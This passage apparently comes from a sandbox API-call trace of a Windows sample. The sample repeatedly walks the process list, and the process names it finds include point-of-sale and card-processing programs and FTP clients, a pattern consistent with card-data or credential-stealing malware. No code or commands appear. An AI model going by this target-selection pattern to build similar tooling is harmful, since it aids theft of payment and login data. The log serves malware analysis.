lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0252.101] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0252.108] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0252.111] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0252.114] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0252.116] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0252.118] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0252.175] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0252.178] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x594, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0252.180] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0252.183] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0252.185] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0252.188] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x100c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0252.190] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1018, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0252.193] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1028, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0252.195] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1034, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="likely-final-out.exe")) returned 1 [0252.197] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="local reality bank.exe")) returned 1 [0252.200] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="kitchen-box-instead.exe")) returned 1 [0252.202] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1058, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x9dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0252.205] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0252.207] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x127c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0252.209] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0252.212] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0252.214] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0252.269] CloseHandle (hObject=0x17b0) returned 1 [0252.269] Sleep (dwMilliseconds=0x64) [0252.406] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0252.422] Process32First (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0252.424] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x79, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0252.426] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0252.428] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0252.430] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0252.431] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0252.438] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0252.440] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0252.442] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0252.444] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0252.447] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0252.449] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0252.504] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4a, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0252.506] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0252.508] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0252.510] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0252.528] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0252.530] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0252.532] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0252.534] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0252.536] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0252.538] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0252.540] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0252.542] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0252.544] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0252.549] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0252.551] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0252.552] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0252.554] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0252.555] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x838, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0252.557] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0252.558] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0252.582] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="studentbecausedemocratic.exe")) returned 1 [0252.583] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="share.exe")) returned 1 [0252.585] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="myself.exe")) returned 1 [0252.586] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="feel.exe")) returned 1 [0252.588] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="action program citizen.exe")) returned 1 [0252.589] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="reachinvolve.exe")) returned 1 [0252.593] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="question.exe")) returned 1 [0252.595] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="play hit.exe")) returned 1 [0252.597] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mean.exe")) returned 1 [0252.598] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xde0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="evening.exe")) returned 1 [0252.599] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="memory everybody nature.exe")) returned 1 [0252.601] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="structurecausebar.exe")) returned 1 [0252.602] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="good.exe")) returned 1 [0252.604] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="item study safe.exe")) returned 1 [0252.605] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="health-prove-opportunity.exe")) returned 1 [0252.610] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="break.exe")) returned 1 [0252.611] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe44, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="minute-budget-themselves.exe")) returned 1 [0252.613] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0252.614] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0252.616] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0252.617] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0252.619] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0252.620] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0252.686] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0252.687] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xea0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0252.689] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0252.692] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, 